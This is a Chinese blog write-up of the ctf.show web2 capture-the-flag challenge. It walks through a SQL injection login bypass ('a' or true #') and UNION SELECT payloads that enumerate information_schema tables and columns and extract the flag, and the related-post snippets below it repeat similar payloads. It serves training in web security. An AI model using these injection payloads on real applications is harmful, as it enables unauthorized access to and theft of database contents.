ctfshow-WEB-web2

已于 2024-06-23 19:46:59 修改
阅读量1.5w 收藏 45
点赞数 14
分类专栏: 《靶场实战》 文章标签: 网络安全 渗透测试 web安全 安全
于 2021-08-19 15:45:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/119803269
版权

  「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可

 

在用户名的输入框中输入万能账号 a' or true #,密码随便输

 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库

首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,2,3 #

 

接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中

a' union select 1,database(),3 #

数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,
(select group_concat(table_name) from information_schema.tables
where table_schema='web2')
,3 #

接下来获取flag表的字段

a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #

接下来获取flag表的数据

a' union select 1,(select flag from flag),3 #

将flag的内容整体复制到输入框中即可过关 

士别三日wyx
关注
  • 14
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
ctf.show_web2解题过程
qq_38634097的博客
05-24 501
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
CTFshow_web2
zoixsoadji的博客
02-28 2245
进入题目,发现题目很简单,首先试试万能密码登陆。 登陆成功,接下来使用bp抓包,并且寻找注入点。 找到注入点,接下来看看它的2下面有什么 查到表名为web2的数据库,接下来继续注入,查询字段。 查找到了flag和user两个数据表,接下来查询字段 最后查询字段内容,得到flag 本人萌新,大佬手下留情 >_< ...
CTFSHOW game-gyctf web2
最新发布
这周末在做梦的博客
07-22 921
反序列化增逃逸
CTF秀web2
天天学安全专属博客
11-20 1009
CTF秀web2,union注入详解
ctf.show_web2
Huamang的博客
02-02 792
万能密码回显成功 查询字段数没有回显 那就联合查询union select,从1试到1,2,3发现三个字段,而且回显位置是第二个 所以开始查询表名 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 出现了flag字段,开始查询flag表的字段名 1' union select 1,group_concat(column_name),3 f
ctfshow之web2
夜未至
03-21 291
本人开了一个知识星球,在星球里每天更新网络安全的文章,其中包含在安全中用到的工具和脚本,分享全国职业技能大赛的相关具体细节及解题思路,在星球中有问必答。然后在地址栏回车,就可以查看网页源代码了,获取到flag:ctfshow{42393163-8074-436c-8383-425d3bd989b6}同样也是开发人员忘记了在发布版本去掉那些注释,只不过web2里禁用了右键检查而已,查看源代码的方式还是有很多,总结:前端验证都是不安全的验证。
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 1891
自用
ctfshow web2
m0_63253040的博客
03-12 1726
打开环境是一个登入页面, 题目提示:最简单的SQL注入,那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显,直接sql注入 ' or 1=1 order by 3# 正常回显,爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...
ctf show web2
yystarry的博客
12-29 216
我们点击View Hint得到“通过在url头部添加view-source:” 我们可以知道,url指的是一种资源定位符号,我们看这个要我们加入的字符,他的结尾有“:”,因此我们可以知道这串字符应该在头部加入 这样我们就得到了flag{cb46cd86-8f4a-4708-bb1d-55f2d8cbea1c} ...
ctf.show web2
qq_53319483的博客
11-16 3403
ctf.show web2
CTFshow Web2
Lig_HossssT的博客
10-09 441
’ or 1=1 union select 1,database(),3# 查阅数据库得到数据库’web2’ ’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表 ’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值